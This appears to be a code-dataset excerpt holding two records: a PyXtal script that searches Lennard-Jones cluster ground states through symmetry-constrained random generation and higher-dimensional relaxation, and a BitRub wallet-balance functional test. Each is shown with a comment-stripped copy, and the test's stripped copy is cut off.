              format(N_success, maxN))
        return res

    def relaxation(self, dim, pgs, ind):
        """Generate and relax one cluster; return a result dict.

        For dim > 3 the structure is alternately relaxed in 3D and in
        the higher-dimensional space until the 3D energy stops improving.
        """
        pos = self.generate_cluster(pgs)
        pg1 = parse_symmetry(pos)
        if dim == 3:
            [energy, pos] = single_optimize(pos, 3)
        else:
            do = True
            while do:
                [energy1, pos1] = single_optimize(pos, 3)
                [energy2, pos2] = single_optimize(pos1, dim)
                [energy3, pos3] = single_optimize(pos2, 3)
                #print(energy1, energy2, energy3)
                if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
                    # No further gain from the detour through the
                    # higher-dimensional space; keep the 3D result.
                    pos = pos1
                    energy = energy1
                    do = False
                    #print('stop')
                else:
                    pos = pos3
        if abs(energy-self.reference['energy']) <1e-3:
            ground = True
        elif energy < self.reference['energy']:
            # Lower than the tabulated reference — flag loudly.
            ground = True
            print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
        else:
            ground = False
        pg2 = parse_symmetry(pos)
        res = {'pos': pos,
               'energy': energy,
               'pg_init': pg1,
               'pg_finial': pg2,
               'ground': ground,
               'id': ind,
              }
        if ground:
            print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
                  format(ind, pg1, pg2, energy, (time()-self.time0)/60))
        elif ind%10 == 0:
            print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
                  format(ind, pg1, pg2, energy, (time()-self.time0)/60))
        return res
if __name__ == "__main__":
    #-------------------------------- Options -------------------------
    parser = OptionParser()
    parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
                      help="dimension, 3 or higher")
    parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
                      help="desired numbers of atoms: 16")
    parser.add_option("-m", "--max", dest="max", default=100, type=int,
                      help="maximum number of attempts")
    parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
                      help="number of processors, default 1")
    (options, args) = parser.parse_args()
    N = options.numIons #38
    maxN = options.max #1000
    dim = options.dim #4
    ncpu = options.proc
    lj_run = LJ_prediction(N)
    eng_min = lj_run.reference['energy']
    t0 = time()
    # Four search campaigns: no symmetry, random point groups, Oh only,
    # and random point groups excluding Oh.
    print("---No symmetry---")
    results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Random symmetry---")
    results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Oh only---")
    results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
    print('time: {0:6.2f} seconds'.format(time()-t0))
    print("---Random symmetry (not Oh)---")
    results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
    print('time: {0:6.2f} seconds'.format(time()-t0))
    # Collect energies and count ground-state hits per campaign.
    eng1 = []
    eng2 = []
    eng3 = []
    eng4 = []
    ground1 = 0
    ground2 = 0
    ground3 = 0
    ground4 = 0
    for dct in results1:
        if dct['ground']:
            ground1 += 1
        eng1.append(dct['energy'])
    for dct in results2:
        if dct['ground']:
            ground2 += 1
        eng2.append(dct['energy'])
    for dct in results3:
        if dct['ground']:
            ground3 += 1
        eng3.append(dct['energy'])
    for dct in results4:
        if dct['ground']:
            ground4 += 1
        eng4.append(dct['energy'])
    eng1 = np.array(eng1)
    eng2 = np.array(eng2)
    eng3 = np.array(eng3)
    eng4 = np.array(eng4)
    # Histogram 1: no symmetry vs random point groups.
    eng_max = max([max(eng1), max(eng2)])
    bins = np.linspace(eng_min-0.1, 0.1, 100)
    plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
    plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
    plt.xlabel('Energy (eV)')
    plt.ylabel('Counts')
    plt.legend(loc=1)
    plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
    plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
    plt.close()
    # Histogram 2: Oh only vs random point groups excluding Oh.
    eng_max = max([max(eng3), max(eng4)])
    bins = np.linspace(eng_min-0.1, 0.1, 100)
    plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
    plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
    plt.xlabel('Energy (eV)')
    plt.ylabel('Counts')
    plt.legend(loc=1)
    plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
    plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
    plt.close()
| 33.250871
| 119
| 0.551085
|
from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
def LJ(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos, (N_atom, dim))
distance = pdist(pos)
r6 = np.power(distance, 6)
r12 = np.multiply(r6, r6)
Eng = np.sum(4*(1/r12 - 1/r6))
if dim > 3:
norm = 0
for i in range(3,dim):
diff = pos[:, i]
norm += np.sum(np.multiply(diff, diff))
Eng += 0.5*mu*norm
return Eng
def LJ_force(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos,[N_atom, dim])
force = np.zeros([N_atom, dim])
for i, pos0 in enumerate(pos):
pos1 = deepcopy(pos)
pos1 = np.delete(pos1, i, 0)
distance = cdist([pos0], pos1)
r = pos1 - pos0
r2 = np.power(distance, 2)
r6 = np.power(r2, 3)
r12 = np.power(r6, 2)
force[i] = np.dot((48/r12-24/r6)/r2, r)
if dim > 3:
for j in range(3,dim):
force[i, j] += mu*pos[i, j]
return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
N_atom = len(pos)
diff = dim - np.shape(pos)[1]
if diff > 0:
pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
elif diff < 0:
pos = pos[:, :dim]
pos = pos.flatten()
res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
pos = np.reshape(res.x, (N_atom, dim))
energy = res.fun
return energy, pos
def parse_symmetry(pos):
mol = Molecule(['C']*len(pos), pos)
try:
symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
except:
symbol = 'N/A'
return symbol
class LJ_prediction():
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons
maxN = options.max
dim = options.dim
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| true
| true
|
f7191733ac9155fe9da162a2124c9882e8a0a396
| 12,464
|
py
|
Python
|
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | 1
|
2019-12-09T18:33:47.000Z
|
2019-12-09T18:33:47.000Z
|
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | null | null | null |
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | 1
|
2019-12-12T20:05:36.000Z
|
2019-12-12T20:05:36.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The BitRub Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet balance RPC methods."""
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
    """Build and sign one raw transaction per fee, paying *amt* to *address*.

    Greedily selects spendable UTXOs from *node* until they cover the
    amount plus the largest fee, then creates one signed transaction for
    each fee (all spending the same inputs). Returns the list of signed
    raw-transaction dicts.
    """
    spendable = [u for u in node.listunspent(0) if u['spendable']]
    # Greedy coin selection: stop once inputs cover amt + the worst fee.
    selected = []
    total_in = 0
    for utxo in spendable:
        selected.append({"txid": utxo["txid"], "vout": utxo["vout"]})
        total_in += utxo['amount']
        if total_in >= amt + max(fees):
            break
    # Make sure there were enough utxos.
    assert total_in >= amt + max(fees)
    signed = []
    for fee in fees:
        outputs = {address: amt}
        # Only add a change output when change would be non-zero.
        if total_in > amt + fee:
            outputs[node.getrawchangeaddress()] = total_in - amt - fee
        raw_tx = node.createrawtransaction(selected, outputs, 0, True)
        raw_tx = node.signrawtransactionwithwallet(raw_tx)
        assert_equal(raw_tx['complete'], True)
        signed.append(raw_tx)
    return signed
class WalletTest(BitRubTestFramework):
    """Functional test for wallet balance RPCs (getbalance,
    getunconfirmedbalance, getbalances) across confirmed, unconfirmed,
    conflicted, and reorged transactions."""
    def set_test_params(self):
        self.num_nodes = 2
        self.setup_clean_chain = True
        self.extra_args = [
            ['-limitdescendantcount=3'],  # Limit mempool descendants as a hack to have wallet txs rejected from the mempool
            [],
        ]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def run_test(self):
        """Drive the two-node balance scenarios end to end."""
        self.nodes[0].importaddress(ADDRESS_WATCHONLY)
        # Check that nodes don't own any UTXOs
        assert_equal(len(self.nodes[0].listunspent()), 0)
        assert_equal(len(self.nodes[1].listunspent()), 0)
        self.log.info("Check that only node 0 is watching an address")
        assert 'watchonly' in self.nodes[0].getbalances()
        assert 'watchonly' not in self.nodes[1].getbalances()
        self.log.info("Mining blocks ...")
        self.nodes[0].generate(1)
        self.sync_all()
        self.nodes[1].generate(1)
        self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
        self.sync_all()
        assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
        assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
        assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
        assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
        assert 'watchonly' not in self.nodes[1].getbalances()
        assert_equal(self.nodes[0].getbalance(), 50)
        assert_equal(self.nodes[1].getbalance(), 50)
        self.log.info("Test getbalance with different arguments")
        assert_equal(self.nodes[0].getbalance("*"), 50)
        assert_equal(self.nodes[0].getbalance("*", 1), 50)
        assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
        assert_equal(self.nodes[0].getbalance(minconf=1), 50)
        assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
        assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
        # Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
        txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
        self.nodes[0].sendrawtransaction(txs[0]['hex'])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()
        txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])
        self.nodes[0].sendrawtransaction(txs[0]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()
        # First argument of getbalance must be set to "*"
        assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
        self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
        # Before `test_balance()`, we have had two nodes with a balance of 50
        # each and then we:
        #
        # 1) Sent 40 from node A to node B with fee 0.01
        # 2) Sent 60 from node B to node A with fee 0.01
        #
        # Then we check the balances:
        #
        # 1) As is
        # 2) With transaction 2 from above with 2x the fee
        #
        # Prior to #16766, in this situation, the node would immediately report
        # a balance of 30 on node B as unconfirmed and trusted.
        #
        # After #16766, we show that balance as unconfirmed.
        #
        # The balance is indeed "trusted" and "confirmed" insofar as removing
        # the mempool transactions would return at least that much money. But
        # the algorithm after #16766 marks it as unconfirmed because the 'taint'
        # tracking of transaction trust for summing balances doesn't consider
        # which inputs belong to a user. In this case, the change output in
        # question could be "destroyed" by replace the 1st transaction above.
        #
        # The post #16766 behavior is correct; we shouldn't be treating those
        # funds as confirmed. If you want to rely on that specific UTXO existing
        # which has given you that balance, you cannot, as a third party
        # spending the other input would destroy that unconfirmed.
        #
        # For example, if the test transactions were:
        #
        # 1) Sent 40 from node A to node B with fee 0.01
        # 2) Sent 10 from node B to node A with fee 0.01
        #
        # Then our node would report a confirmed balance of 40 + 50 - 10 = 80
        # BTR, which is more than would be available if transaction 1 were
        # replaced.
        def test_balances(*, fee_node_1=0):
            # Assert the expected balance views on both nodes, given node 1's
            # current outgoing fee.
            # getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
            assert_equal(self.nodes[0].getbalance(), Decimal('9.99'))  # change from node 0's send
            assert_equal(self.nodes[1].getbalance(), Decimal('0'))  # node 1's send had an unsafe input
            # Same with minconf=0
            assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
            assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
            # getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
            # TODO: fix getbalance tracking of coin spentness depth
            assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
            assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
            # getunconfirmedbalance
            assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60'))  # output of node 1's spend
            assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
            assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
            assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)  # Doesn't include output of node 0's send since it was spent
            assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
            assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
        test_balances(fee_node_1=Decimal('0.01'))
        # Node 1 bumps the transaction fee and resends
        self.nodes[1].sendrawtransaction(txs[1]['hex'])
        self.nodes[0].sendrawtransaction(txs[1]['hex'])  # sending on both nodes is faster than waiting for propagation
        self.sync_all()
        self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
        test_balances(fee_node_1=Decimal('0.02'))
        self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
        self.sync_all()
        # balances are correct after the transactions are confirmed
        assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))  # node 1's send plus change from node 0's send
        assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))  # change from node 0's send
        # Send total balance away from node 1
        txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
        self.nodes[1].sendrawtransaction(txs[0]['hex'])
        self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
        self.sync_all()
        # getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
        # TODO: fix getbalance tracking of coin spentness depth
        # getbalance with minconf=3 should still show the old balance
        assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
        # getbalance with minconf=2 will show the new balance.
        assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
        # check mempool transactions count for wallet unconfirmed balance after
        # dynamically loading the wallet.
        before = self.nodes[1].getunconfirmedbalance()
        dst = self.nodes[1].getnewaddress()
        self.nodes[1].unloadwallet('')
        self.nodes[0].sendtoaddress(dst, 0.1)
        self.sync_all()
        self.nodes[1].loadwallet('')
        after = self.nodes[1].getunconfirmedbalance()
        assert_equal(before + Decimal('0.1'), after)
        # Create 3 more wallet txs, where the last is not accepted to the
        # mempool because it is the third descendant of the tx above
        for _ in range(3):
            # Set amount high enough such that all coins are spent by each tx
            txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
        self.log.info('Check that wallet txs not in the mempool are untrusted')
        assert txid not in self.nodes[0].getrawmempool()
        assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)
        self.log.info("Test replacement and reorg of non-mempool tx")
        tx_orig = self.nodes[0].gettransaction(txid)['hex']
        # Increase fee by 1 coin
        tx_replace = tx_orig.replace(
            struct.pack("<q", 99 * 10**8).hex(),
            struct.pack("<q", 98 * 10**8).hex(),
        )
        tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
        # Total balance is given by the sum of outputs of the tx
        total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
        self.sync_all()
        self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
        # Now confirm tx_replace
        block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
        self.sync_all()
        assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
        self.log.info('Put txs back into mempool of node 1 (not node 0)')
        self.nodes[0].invalidateblock(block_reorg)
        self.nodes[1].invalidateblock(block_reorg)
        self.sync_blocks()
        self.nodes[0].syncwithvalidationinterfacequeue()
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)  # wallet txs not in the mempool are untrusted
        self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
        assert_equal(self.nodes[0].getbalance(minconf=0), 0)  # wallet txs not in the mempool are untrusted
        # Now confirm tx_orig
        self.restart_node(1, ['-persistmempool=0'])
        connect_nodes(self.nodes[0], 1)
        sync_blocks(self.nodes)
        self.nodes[1].sendrawtransaction(tx_orig)
        self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
        self.sync_all()
        assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1)  # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
    # Entry point: run the wallet balance functional test.
    WalletTest().main()
| 47.572519
| 153
| 0.656611
|
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
utxos = [u for u in node.listunspent(0) if u['spendable']]
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'],
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
# tracking of transaction trust for summing balances doesn't consider
specific UTXO existing
# which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0'))
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex'])
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))
assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
